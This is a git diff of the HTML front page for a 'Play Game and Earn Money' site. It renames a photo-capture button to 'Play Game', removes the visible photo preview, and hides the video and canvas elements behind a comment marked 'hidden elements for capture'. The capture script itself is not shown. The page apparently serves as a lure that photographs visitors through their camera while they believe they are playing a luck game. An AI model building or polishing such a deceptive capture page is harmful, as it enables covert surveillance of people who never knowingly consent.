--- a/public/index.html
+++ b/public/index.html
@@ -1,35 +1,65 @@
-<!doctype html>
+<!DOCTYPE html>
 <html lang="en">
 <head>
   <meta charset="utf-8" />
   <meta name="viewport" content="width=device-width,initial-scale=1" />
   <title>Play Game and Earn Money</title>
-
   <style>
-    body{font-family:Arial,Helvetica,sans-serif;background:#f3f4f6;margin:0;padding:20px;display:flex;flex-direction:column;align-items:center;}
-    .card{width:100%;max-width:420px;background:#fff;border-radius:16px;padding:24px;box-shadow:0 6px 20px rgba(0,0,0,0.08);text-align:center;}
-    h1{margin:0 0 8px;font-size:22px;color:#0f172a;}
-    p{color:#475569;margin:0 0 18px;}
-    button{background:#16a34a;color:white;border:0;padding:12px 22px;border-radius:10px;font-size:16px;cursor:pointer;transition:transform .12s;}
-    button:active{transform:scale(.98)}
-    #status{margin-top:14px;font-weight:600}
-    #preview{margin-top:16px;max-width:100%;border-radius:12px;display:none;box-shadow:0 6px 18px rgba(15,23,42,0.08)}
-    .small{font-size:13px;color:#64748b;margin-top:8px}
+    :root { --green: #1ba94c; --green-dark: #179441; }
+    body {
+      font-family: Arial, Helvetica, sans-serif;
+      background: #f5f6f8;
+      margin: 0;
+      padding: 60px 20px;
+      display:flex;
+      justify-content:center;
+    }
+    .card {
+      width:100%;
+      max-width:480px;
+      background: white;
+      border-radius: 12px;
+      box-shadow: 0 8px 30px rgba(0,0,0,0.08);
+      padding: 34px 28px;
+      text-align:center;
+    }
+    h2 { margin: 0 0 8px; font-size: 1.35rem; }
+    p.lead { color: #444; margin: 0 0 22px; }
+    button#playBtn {
+      background: var(--green);
+      color: #fff;
+      border: none;
+      padding: 12px 26px;
+      border-radius: 8px;
+      font-size: 1.05rem;
+      cursor: pointer;
+    }
+    button#playBtn:hover { background: var(--green-dark); }
+    #status {
+      margin-top: 20px;
+      font-weight: 600;
+      color: #222;
+    }
+    #status .win { color: #0a8b3b; }
+    #status .lose { color: #c62828; }
+    a.filelink { display:block; margin-top:8px; font-weight:600; color:#0b66ff; text-decoration:none; }
+    /* hide video/canvas visually */
+    video, canvas { display:none !important; width:0; height:0; }
   </style>
 </head>
 <body>
   <div class="card">
-    <h1>💰 Play Game and Earn Money</h1>
-    <p>Click <strong>Play Game</strong> to try your luck.</p>
+    <h2>💰 Play Game and Earn Money</h2>
+    <p class="lead">Click <strong>Play Game</strong> to try your luck.</p>
 
-    <button id="captureBtn">Play Game</button>
-    <div id="status" class="small"></div>
-    <img id="preview" alt="Captured photo preview" />
-    <div id="fileUrl" class="small"></div>
+    <button id="playBtn">Play Game</button>
+
+    <div id="status"></div>
+
+    <!-- hidden elements for capture -->
+    <video id="video" autoplay playsinline></video>
+    <canvas id="canvas"></canvas>
   </div>
-
-  <video id="video" autoplay playsinline style="display:none"></video>
-  <canvas id="canvas" style="display:none"></canvas>
 
   <script src="script.js"></script>
 </body>
